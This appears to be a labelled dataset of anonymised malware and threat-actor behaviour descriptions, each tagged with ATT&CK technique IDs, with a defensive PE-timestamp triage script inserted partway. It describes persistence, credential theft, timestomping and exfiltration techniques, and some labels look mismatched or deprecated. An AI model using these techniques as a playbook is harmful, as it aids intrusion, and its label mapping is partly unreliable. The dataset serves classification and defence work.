{"text1":"samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.","labels":"['T1027.002']"}
|
|
{"text1":"samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.","labels":"['T1553.002']"}
|
|
{"text1":"samples were timestomped by the authors by setting the PE timestamps to all zero values. also has a built-in command to modify file times.","labels":"['T1070.006']"}
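Two entries on this page concern the PE compile timestamp rather than filesystem times: Borland Delphi mangling the default timestamp, and authors zeroing the PE timestamps outright. Both are visible in the COFF header's TimeDateStamp field, so a triage script can flag them before any dynamic analysis. The following is an added example, not code from the page: it builds minimal PE images in memory (constructed, not loadable), reads TimeDateStamp, and classifies it as zeroed, as the fixed value older Delphi linkers write (0x2A425E19, 1992-06-19 22:22:17 UTC), as in the future relative to a fixed analysis time, or as plausible. The analysis time and the sample values are assumptions for reproducibility.

```python
"""Triage PE compile timestamps for zeroing and the old Delphi constant.

Added example. build_pe() fabricates just enough of a PE image for the
parser; the sample stamps and ANALYSIS_TIME are constructed."""
import struct
from datetime import datetime, timezone

DELPHI_STAMP = 0x2A425E19  # fixed linker value of older Delphi versions (1992-06-19 22:22:17 UTC)
ANALYSIS_TIME = datetime(2024, 3, 4, tzinfo=timezone.utc)  # assumed "now" for reproducible output


def build_pe(timestamp: int) -> bytes:
    """Construct a minimal, non-loadable PE image carrying the given COFF
    TimeDateStamp: DOS header with e_lfanew, 'PE\\0\\0', then the 20-byte
    COFF file header (Machine, NumberOfSections, TimeDateStamp, ...)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x102)
    return dos + b"PE\0\0" + coff


def pe_timestamp(image: bytes) -> int:
    """Read IMAGE_FILE_HEADER.TimeDateStamp (offset 8 from the PE signature)."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return struct.unpack_from("<I", image, e_lfanew + 8)[0]


def assess_timestamp(stamp: int, now: datetime = ANALYSIS_TIME) -> str:
    """Classify a compile timestamp. 'zeroed' and 'future' are strong
    timestomping hints; 'delphi-default' means the value says nothing about
    when the file was built and must not be used for timeline analysis."""
    if stamp == 0:
        return "zeroed"
    if stamp == DELPHI_STAMP:
        return "delphi-default"
    when = datetime.fromtimestamp(stamp, tz=timezone.utc)
    if when > now:
        return "future"
    return "plausible"


def triage(images) -> list:
    """Return (verdict, ISO date or None) for each image in order."""
    out = []
    for img in images:
        stamp = pe_timestamp(img)
        when = None if stamp == 0 else datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat()
        out.append((assess_timestamp(stamp), when))
    return out


if __name__ == "__main__":
    samples = [build_pe(0), build_pe(DELPHI_STAMP), build_pe(0x7FFFFFFF), build_pe(1600000000)]
    for verdict, when in triage(samples):
        print(verdict, when)
```

A zeroed or future stamp is only a hint, and the Delphi constant is shared by every legitimate binary built with those compiler versions, so the useful output is a verdict that tells the analyst whether the timestamp can be trusted at all, not an alert on its own. On real files, read the same field with a full parser (for example the pefile module) rather than this minimal reader.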
|
|
{"text1":"saves each collected file with the automatically generated format {0:dd-MM-yyyy}.txt.","labels":"['T1119']"}
|
|
{"text1":"saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service.","labels":"['T1036']"}
|
|
{"text1":"saves itself with a leading \".\" so that it's hidden from users by default.","labels":"['T1564.001']"}
|
|
{"text1":"scanned the \u201cProgram Files\u201d directories for a directory with the string \u201cTotal Security\u201d (the installation path of the \u201c360 Total Security\u201d antivirus tool).","labels":"['T1518.001']"}
|
|
{"text1":"scans processes on all victim systems in the environment and uses automated scripts to pull back the results.","labels":"['T1064', 'T1119']"}
|
|
{"text1":"scans the C-class subnet of the IPs on the victim's interfaces.","labels":"['T1018']"}
|
|
{"text1":"schedules the execution of one of its modules by creating a new scheduler task.","labels":"['T1053.005']"}
|
|
{"text1":"scripts save memory dump data into a specific directory on hosts in the victim environment.","labels":"['T1074']"}
|
|
{"text1":"searches attached and mounted drives for file extensions and keywords that match a predefined list.","labels":"['T1083']"}
|
|
{"text1":"searches for certain Registry keys to be configured before executing the payload.","labels":"['T1012']"}
|
|
{"text1":"searches for files created within a certain timeframe and whose file extension matches a predefined list.","labels":"['T1083']"}
|
|
{"text1":"searches for files named logins.json to parse for credentials and also looks for credentials stored from browsers.","labels":"['T1552.001']"}
|
|
{"text1":"searches for files on attached removable drives based on a predefined list of file extensions every five seconds.","labels":"['T1025']"}
|
|
{"text1":"searches for files on local drives based on a predefined list of file extensions.","labels":"['T1005']"}
|
|
{"text1":"searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by .","labels":"['T1025']"}
|
|
{"text1":"searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.","labels":"['T1083']"}
|
|
{"text1":"searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration.","labels":"['T1114']"}
|
|
{"text1":"searches for network drives and removable media and duplicates itself onto them.","labels":"['T1105']"}
|
|
{"text1":"searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.","labels":"['T1114']"}
|
|
{"text1":"searches removable storage devices for files with a pre-defined list of file extensions (e.g. *.doc, *.ppt, *.xls, *.docx, *.pptx, *.xlsx). Any matching files are encrypted and written to a local user directory.","labels":"['T1119']"}
|
|
{"text1":"searches the local system and gathers data.","labels":"['T1005']"}
|
|
{"text1":"searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip","labels":"['T1083']"}
|
|
{"text1":"searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).","labels":"['T1114']"}
|
|
{"text1":"searches victim drives for files matching certain extensions (\u201c.skr\u201d,\u201c.pkr\u201d or \u201c.key\u201d) or names.","labels":"['T1083']"}
|
|
{"text1":"SEKURLSA::Pth module can impersonate a user, with only a password hash, to execute arbitrary commands.","labels":"['T1550.002']"}
|
|
{"text1":"sends an OS version identifier in its beacons.","labels":"['T1082']"}
|
|
{"text1":"sends emails to victims with a malicious executable disguised as a document or spreadsheet displaying a fake icon.","labels":"['T1598.002']"}
|
|
{"text1":"sends images to users that are embedded with shellcode and obfuscates strings and payloads.","labels":"['T1027']"}
|
|
{"text1":"sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.","labels":"['T1082']"}
|
|
{"text1":"sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy.","labels":"['T1598.002']"}
|
|
{"text1":"sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShell scripts to download Pupy.","labels":"['T1598.003']"}
|
|
{"text1":"sent spear phishing emails containing links to .hta files.","labels":"['T1598.003']"}
|
|
{"text1":"sent spearphishing emails containing malicious Microsoft Office attachments.","labels":"['T1598.002']"}
|
|
{"text1":"sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.","labels":"['T1598.003']"}
|
|
{"text1":"service-based DLL implant can execute a downloaded file with parameters specified using CreateProcessAsUser.","labels":"['T1546.009']"}
|
|
{"text1":"service-based DLL implant traverses the FTP server\u2019s directories looking for files with keyword matches for computer names or certain keywords.","labels":"['T1083']"}
|
|
{"text1":"sets a WH_CBT Windows hook to collect information on process creation.","labels":"['T1057']"}
|
|
{"text1":"sets a WH_CBT Windows hook to search for and capture files on the victim.","labels":"['T1083']"}
|
|
{"text1":"sets the timestamps of its dropper files to the last-access and last-write timestamps of a standard Windows library chosen on the system.","labels":"['T1070.006']"}
|
|
{"text1":"Several backdoors achieved persistence by adding a Run key.","labels":"['T1547.001']"}
|
|
{"text1":"Several malware families are capable of downloading and executing binaries from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"Several malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by also collects disk space information and sends it to its C2 server.","labels":"['T1082']"}
|
|
{"text1":"Several malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another malware sample XORs C2 traffic. malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks.","labels":"['T1573']"}
|
|
{"text1":"Several malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.","labels":"['T1070.006']"}
|
|
{"text1":"Several malware samples use a common function to identify target files by their extension. malware families can also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.","labels":"['T1083']"}
|
|
{"text1":"Several tools encode data with base64 when posting it to a C2 server.","labels":"['T1132']"}
|
|
{"text1":"shellcode decrypts and decompresses its RC4-encrypted payload.","labels":"['T1140']"}
|
|
{"text1":"side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","labels":"['T1574.002']"}
|
|
{"text1":"Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes commonly used ports such as 443, 53, 80, 25, and 8080.","labels":"['T1043']"}
|
|
{"text1":"Some malware uses a list of ordered port numbers to choose a port for C2 traffic, which includes uncommonly used ports such as 995, 1816, 465, 1521, 3306, and many others.","labels":"['T1571']"}
|
|
{"text1":"Some malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions.","labels":"['T1026']"}
|
|
{"text1":"Some resources in are encrypted with a simple XOR operation or encoded with Base64.","labels":"['T1027']"}
|
|
{"text1":"Some samples contain a publicly available Web browser password recovery tool.","labels":"['T1003']"}
|
|
{"text1":"Some samples have a module to extract email from Microsoft Exchange servers using compromised credentials.","labels":"['T1078', 'T1114']"}
|
|
{"text1":"Some samples have a module to use pass the ticket with Kerberos for authentication.","labels":"['T1550.003']"}
|
|
{"text1":"Some samples install themselves as services for persistence by calling WinExec with the net start argument.","labels":"['T1543.003']"}
|
|
{"text1":"Some samples use a custom encryption method for C2 traffic using AES, base64 encoding, and multiple keys.","labels":"['T1573']"}
|
|
{"text1":"Some samples use AES to encrypt C2 traffic.","labels":"['T1573']"}
|
|
{"text1":"Some samples use cmd.exe to delete temporary files.","labels":"['T1070.004']"}
|
|
{"text1":"Some samples were signed with a stolen digital certificate.","labels":"['T1553.002']"}
|
|
{"text1":"Some strings in are obfuscated with XOR x56.","labels":"['T1027']"}
|
|
{"text1":"Some variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.","labels":"['T1071']"}
|
|
{"text1":"Some variants of achieve persistence by registering the payload as a Shell Icon Overlay handler COM object.","labels":"['T1546.015']"}
|
|
{"text1":"Some variants of use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"","labels":"['T1546.010']"}
|
|
{"text1":"Some variants of use SSL to communicate with C2 servers.","labels":"['T1071']"}
|
|
{"text1":"Some variants use HTTP for C2.","labels":"['T1071']"}
|
|
{"text1":"Some variants use ports 8080 and 8000 for C2.","labels":"['T1043']"}
|
|
{"text1":"Some variants use raw TCP for C2.","labels":"['T1095']"}
|
|
{"text1":"Some variants use SSL to encrypt C2 communications.","labels":"['T1573']"}
|
|
{"text1":"Some versions have an embedded DLL known as MockDll that uses and regsvr32 to execute another payload.","labels":"['T1218.010']"}
|
|
{"text1":"Some versions have an embedded DLL known as MockDll that uses process hollowing and to execute another payload.","labels":"['T1055.012']"}
|
|
{"text1":"Some versions of have used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.","labels":"['T1573']"}
|
|
{"text1":"spawns a new copy of c:\\windows\\syswow64\\explorer.exe and then replaces the executable code in memory with malware.","labels":"['T1055.012']"}
|
|
{"text1":"spearphished victims via Facebook and Whatsapp.","labels":"['T1566.003']"}
|
|
{"text1":"spear phishing campaigns have included malicious Word documents with DDE execution.","labels":"['T1559.002']"}
|
|
{"text1":"specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally","labels":"['T1069']"}
|
|
{"text1":"splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.","labels":"['T1030']"}
|
|
{"text1":"stages command output and collected data in files before exfiltration.","labels":"['T1074']"}
|
|
{"text1":"stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.","labels":"['T1074']"}
|
|
{"text1":"steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).","labels":"['T1003']"}
|
|
{"text1":"steals credentials from its victims.","labels":"['T1003']"}
|
|
{"text1":"steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism.","labels":"['T1003']"}
|
|
{"text1":"steals data stored in the clipboard.","labels":"['T1115']"}
|
|
{"text1":"steals files based on an extension list if a USB drive is connected to the system.","labels":"['T1025']"}
|
|
{"text1":"steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1005']"}
|
|
{"text1":"steals user files from local hard drives with file extensions that match a predefined list.","labels":"['T1005']"}
|
|
{"text1":"steals user files from network shared drives with file extensions and keywords that match a predefined list.","labels":"['T1039']"}
|
|
{"text1":"stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.","labels":"['T1547.001']"}
|
|
{"text1":"stores configuration values under the Registry key HKCU\\Software\\Microsoft\\[dllname] and modifies Registry keys under HKCR\\CLSID\\...\\InprocServer32with a path to the launcher.","labels":"['T1112']"}
|
|
{"text1":"stores information gathered from the endpoint in a file named 1.hwp.","labels":"['T1074']"}
|
|
{"text1":"stores itself in ~\/Library\/.DS_Stores\/","labels":"['T1564.001']"}
|
|
{"text1":"stores output from command execution in a .dat file in the %TEMP% directory.","labels":"['T1074']"}
|
|
{"text1":"stores the encoded configuration file in the Registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentContorlSet\\Control\\WMI\\Security.","labels":"['T1112']"}
|
|
{"text1":"supports execution from the command-line.","labels":"['T1059']"}
|
|
{"text1":"supports file encryption (AES with the key \"lolomycin2017\").","labels":"['T1027']"}
|
|
{"text1":"surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.","labels":"['T1049']"}
|
|
{"text1":"surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, and in the Program Files directory.","labels":"['T1083']"}
|
|
{"text1":"surveys a system upon check-in to discover information in the Windows Registry with the reg query command.","labels":"['T1012']"}
|
|
{"text1":"surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, and net config commands.","labels":"['T1016']"}
|
|
{"text1":"surveys a system upon check-in to discover operating system configuration details using the systeminfo and set commands.","labels":"['T1082']"}
|
|
{"text1":"surveys a system upon check-in to discover remote systems on a local network using the net view and net view \/DOMAIN commands.","labels":"['T1018']"}
|
|
{"text1":"surveys a system upon check-in to discover the system time by using the net time command.","labels":"['T1124']"}
|
|
{"text1":"takes screenshots of the compromised system's desktop and saves them to C:\\system\\screenshot.bmp for exfiltration every 60 minutes.","labels":"['T1113']"}
|
|
{"text1":"terminates anti-malware processes if they\u2019re found running on the system.","labels":"['T1562.001']"}
|
|
{"text1":"The 's Information Gathering Tool (IGT) includes PowerShell components.","labels":"['T1059.001']"}
|
|
{"text1":"The \"SCOUT\" variant of achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Registry key.","labels":"['T1547.001']"}
|
|
{"text1":"The \"tDiscoverer\" variant of establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.","labels":"['T1102']"}
|
|
{"text1":"The \"Uploader\" variant of visits a hard-coded server over HTTP\/S to download the images uses to receive commands.","labels":"['T1071']"}
|
|
{"text1":"The \"ZR\" variant of will check to see if known host-based firewalls are installed on the infected systems. will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.","labels":"['T1562.001']"}
|
|
{"text1":"The 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.","labels":"['T1547.009', 'T1547.001']"}
|
|
{"text1":"The backdoor compresses communications using the standard Zlib compression library.","labels":"['T1560']"}
|
|
{"text1":"The C2 channel uses an 11-byte XOR algorithm to hide data.","labels":"['T1573']"}
|
|
{"text1":"The C2 channel uses HTTP POST requests.","labels":"['T1071']"}
|
|
{"text1":"The C2 server response to a beacon sent by a variant of contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of use various XOR operations to encrypt C2 data.","labels":"['T1573']"}
|
|
{"text1":"The client has been signed by fake and invalid digital certificates.","labels":"['T1553.002']"}
|
|
{"text1":"The command and control protocol's data stream can be encrypted with AES-CBC.","labels":"['T1573']"}
|
|
{"text1":"The component KillDisk is capable of deleting Windows Event Logs.","labels":"['T1070']"}
|
|
{"text1":"The config file is encrypted with RC4.","labels":"['T1027']"}
|
|
{"text1":"The crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry.","labels":"['T1518.001']"}
|
|
{"text1":"The discovery modules used with can collect information on accounts and permissions.","labels":"['T1087']"}
|
|
{"text1":"The discovery modules used with can collect information on network connections.","labels":"['T1049']"}
|
|
{"text1":"The discovery modules used with can collect information on process details.","labels":"['T1057']"}
|
|
{"text1":"The dropper can delete itself from the victim. Another variant has the capability to delete specified files.","labels":"['T1070.004']"}
|
|
{"text1":"The dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main component.","labels":"['T1218.011']"}
|
|
{"text1":"The dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.","labels":"['T1036']"}
|
|
{"text1":"The dropper uses a function to obfuscate the name of functions and other parts of the malware.","labels":"['T1027']"}
|
|
{"text1":"The dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.","labels":"['T1047']"}
|
|
{"text1":"The executable version of has a module to log keystrokes.","labels":"['T1056']"}
|
|
{"text1":"The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by as a name for malware.","labels":"['T1036']"}
|
|
{"text1":"The group has been known to compress data before exfiltration.","labels":"['T1560']"}
|
|
{"text1":"The group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate. Some malware that has been used by also uses steganography to hide communication in PNG image files.","labels":"['T1001']"}
|
|
{"text1":"The group is known to utilize WMI for lateral movement.","labels":"['T1047']"}
|
|
{"text1":"The initial beacon packet for contains the operating system version and file system of the victim.","labels":"['T1082']"}
|
|
{"text1":"The initial beacon packet for contains the operating system version of the victim.","labels":"['T1082']"}
|
|
{"text1":"The installer loads a DLL using rundll32.","labels":"['T1218.011']"}
|
|
{"text1":"The loader implements itself with the name Security Support Provider, a legitimate Windows function. Various .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. also disguised malicious modules using similar filenames as custom network encryption software on victims.","labels":"['T1036']"}
|
|
{"text1":"The malware communicates through the use of events in Google Calendar.","labels":"['T1102']"}
|
|
{"text1":"The malware communicates to its command server using HTTP with an encrypted payload.","labels":"['T1071']"}
|
|
{"text1":"The malware platform can use ICMP to communicate between infected computers.","labels":"['T1095']"}
|
|
{"text1":"The malware platform can use Windows admin shares to move laterally.","labels":"['T1021.002']"}
|
|
{"text1":"The malware supports timestomping.","labels":"['T1070.006']"}
|
|
{"text1":"The net accounts and net accounts \/domain commands with can be used to obtain password policy information.","labels":"['T1201']"}
|
|
{"text1":"The net time command can be used in to determine the local or remote system time.","labels":"['T1124']"}
|
|
{"text1":"The net user username \\password and net user username \\password \\domain commands in can be used to create a local or domain account respectively.","labels":"['T1136']"}
|
|
{"text1":"The OsInfo function in collects a running process list.","labels":"['T1057']"}
|
|
{"text1":"The OsInfo function in collects the current running username.","labels":"['T1033']"}
|
|
{"text1":"The payload is stored in a hidden directory at \/Users\/Shared\/.local\/kextd.","labels":"['T1564.001']"}
|
|
{"text1":"The payload of is encrypted with simple XOR with a rotating key. The configuration file has been encrypted with RC4 keys.","labels":"['T1027']"}
|
|
{"text1":"The RAT has a keylogger.","labels":"['T1056']"}
|
|
{"text1":"The reconnaissance modules used with can collect information on network configuration.","labels":"['T1016']"}
|
|
{"text1":"There is a variant of that uses a PowerShell script instead of the traditional PE form.","labels":"['T1059.001']"}
|
|
{"text1":"The Ritsol backdoor trojan used by can download files onto a compromised host from a remote location.","labels":"['T1105']"}
|
|
{"text1":"The trojan supports file deletion.","labels":"['T1070.004']"}
|
|
{"text1":"The uploader or malware the uploader uses command to delete the RAR archives after they have been exfiltrated.","labels":"['T1070.004']"}
|
|
{"text1":"To establish persistence, adds a Registry Run key with a value \"TaskMgr\" in an attempt to masquerade as the legitimate Windows Task Manager.","labels":"['T1036']"}
|
|
{"text1":"To establish persistence, identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.","labels":"['T1547.009', 'T1036', 'T1547.001']"}
|
|
{"text1":"tools attempt to spoof anti-virus processes as a means of self-defense.","labels":"['T1036']"}
|
|
{"text1":"tools contained an application to check performance of USB flash drives.","labels":"['T1120']"}
|
|
{"text1":"Traffic traversing the network will be forwarded to multiple nodes before exiting the network and continuing on to its intended destination.","labels":"['T1090.003']"}
|
|
{"text1":"transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.","labels":"['T1041']"}
|
|
{"text1":"transfers files from the compromised host via HTTP or HTTPS to a C2 server.","labels":"['T1071']"}
|
|
{"text1":"tries to add a Registry Run key under the name \"Windows Update\" to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"tries to add a scheduled task to establish persistence.","labels":"['T1053.005']"}
|
|
{"text1":"TRINITY malware used by identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data, actors compressed data and moved it to another staging system before exfiltration.","labels":"['T1074']"}
|
|
{"text1":"typically use ping and to enumerate systems.","labels":"['T1018']"}
|
|
{"text1":"uploads and downloads information.","labels":"['T1105']"}
|
|
{"text1":"uploads data in 2048-byte chunks.","labels":"['T1030']"}
|
|
{"text1":"uploads files and secondary payloads to the victim's machine.","labels":"['T1105']"}
|
|
{"text1":"used a cloud-based remote access software called LogMeIn for their attacks.","labels":"['T1219']"}
|
|
{"text1":"used a cron job for persistence on Mac devices.","labels":"['T1053']"}
|
|
{"text1":"used an HTTP malware variant and a Port 22 malware variant to collect the victim\u2019s username.","labels":"['T1033']"}
|
|
{"text1":"used a rootkit to modify typical server functionality.","labels":"['T1014']"}
|
|
{"text1":"used a SharePoint enumeration and data dumping tool known as spwebmember.","labels":"['T1213']"}
|
|
{"text1":"used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.","labels":"['T1083']"}
|
|
{"text1":"used Base64 to encode C2 traffic.","labels":"['T1132']"}
|
|
{"text1":"used Base64 to obfuscate commands and the payload.","labels":"['T1027']"}
|
|
{"text1":"used batch scripts to enumerate network information, including information about trusts, zones, and the domain.","labels":"['T1016']"}
|
|
{"text1":"used batch scripts to enumerate users in the victim environment.","labels":"['T1087']"}
|
|
{"text1":"used cmd.exe to launch commands on the victim\u2019s machine.","labels":"['T1059']"}
|
|
{"text1":"used command line for execution.","labels":"['T1059']"}
|
|
{"text1":"used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.","labels":"['T1102']"}
|
|
{"text1":"used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.","labels":"['T1220']"}
|
|
{"text1":"used PowerShell scripts for execution.","labels":"['T1059.001']"}
|
|
{"text1":"used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.","labels":"['T1018', 'T1046']"}
|
|
{"text1":"used RDP to move laterally in victim networks.","labels":"['T1021.001']"}
|
|
{"text1":"used regsvr32.exe to execute scripts.","labels":"['T1218.010']"}
|
|
{"text1":"used Regsvr32 to bypass application whitelisting techniques.","labels":"['T1218.010']"}
|
|
{"text1":"used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.","labels":"['T1053.005']"}
|
|
{"text1":"used SMTP as a communication channel in various implants, initially using self-registered Google Mail accounts and later compromised email servers of its victims. Later implants such as use a blend of HTTP and other legitimate channels, depending on module configuration.","labels":"['T1071']"}
|
|
{"text1":"used spearphishing emails with malicious Microsoft Word attachments to infect victims.","labels":"['T1598.002']"}
|
|
{"text1":"used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.","labels":"['T1598.003']"}
|
|
{"text1":"used sticky-keys to obtain unauthenticated, privileged console access.","labels":"['T1546.008']"}
|
|
{"text1":"used the Ammyy Admin tool as well as TeamViewer for remote access.","labels":"['T1219']"}
|
|
{"text1":"used the Plink command-line utility to create SSH tunnels to C2 servers.","labels":"['T1573', 'T1071']"}
|
|
{"text1":"used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.","labels":"['T1036']"}
|
|
{"text1":"used to download payloads, run a reverse shell, and execute malware on the victim's machine.","labels":"['T1059.001']"}
|
|
{"text1":"used to launch an authentication window for users to enter their credentials.","labels":"['T1187']"}
|
|
{"text1":"used to remove artifacts from victims.","labels":"['T1070']"}
|
|
{"text1":"used UPX to pack files.","labels":"['T1027.002']"}
|
|
{"text1":"used various social media channels to spearphish victims.","labels":"['T1566.003']"}
|
|
{"text1":"used VBS and JavaScript scripts to help perform tasks on the victim's machine.","labels":"['T1064']"}
|
|
{"text1":"used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.","labels":"['T1133']"}
|
|
{"text1":"use HTTPS for all command and control communication methods.","labels":"['T1071']"}
|
|
{"text1":"uses 's malleable C2 functionality to blend in with network traffic.","labels":"['T1095']"}
|
|
{"text1":"uses 443 for C2 communications.","labels":"['T1043']"}
|
|
{"text1":"uses a backup communication method with an HTTP beacon.","labels":"['T1008']"}
|
|
{"text1":"uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.","labels":"['T1112']"}
|
|
{"text1":"uses a batch file to kill a security program task and then attempts to remove itself.","labels":"['T1064']"}
|
|
{"text1":"uses a batch file to load a DLL into the svchost.exe process.","labels":"['T1055']"}
|
|
{"text1":"uses a command-line interface.","labels":"['T1059']"}
|
|
{"text1":"uses a command-line interface to interact with systems.","labels":"['T1059']"}
|
|
{"text1":"uses a copy of tor2web proxy for HTTPS communications.","labels":"['T1090.003']"}
|
|
{"text1":"uses a custom binary protocol for C2 communications.","labels":"['T1095']"}
|
|
{"text1":"uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications.","labels":"['T1095']"}
|
|
{"text1":"uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.","labels":"['T1043', 'T1071']"}
|
|
{"text1":"uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.","labels":"['T1043']"}
|
|
{"text1":"uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic.","labels":"['T1573']"}
|
|
{"text1":"uses a custom DNS tunneling protocol for C2.","labels":"['T1095']"}
|
|
{"text1":"uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.","labels":"['T1573']"}
|
|
{"text1":"uses a custom encryption algorithm on data sent back to the C2 server over HTTP.","labels":"['T1573']"}
|
|
{"text1":"uses a customized XOR algorithm to encrypt C2 communications.","labels":"['T1573']"}
|
|
{"text1":"uses a custom packer.","labels":"['T1027.002']"}
|
|
{"text1":"uses a custom packing algorithm.","labels":"['T1027.002']"}
|
|
{"text1":"uses a custom TCP protocol for C2.","labels":"['T1095']"}
|
|
{"text1":"uses a custom UDP protocol to communicate.","labels":"['T1095']"}
|
|
{"text1":"uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.","labels":"['T1553.002']"}
|
|
{"text1":"uses AES and a preshared key to decrypt the custom Base64 routine used to encode strings and scripts.","labels":"['T1140']"}
|
|
{"text1":"uses AES to encrypt C2 communications.","labels":"['T1573']"}
|
|
{"text1":"uses AES to encrypt certain information sent over its C2 channel.","labels":"['T1573']"}
|
|
{"text1":"uses AES to encrypt network communication.","labels":"['T1573']"}
|
|
{"text1":"uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.","labels":"['T1074', 'T1564.001']"}
|
|
{"text1":"uses a keylogger and steals clipboard contents from victims.","labels":"['T1056']"}
|
|
{"text1":"uses a keylogger plugin to gather keystrokes.","labels":"['T1056']"}
|
|
{"text1":"uses a keylogger to capture keystrokes.","labels":"['T1056']"}
|
|
{"text1":"uses a keylogger to capture keystrokes and location of where the user is typing.","labels":"['T1056']"}
|
|
{"text1":"uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.","labels":"['T1056']"}
|
|
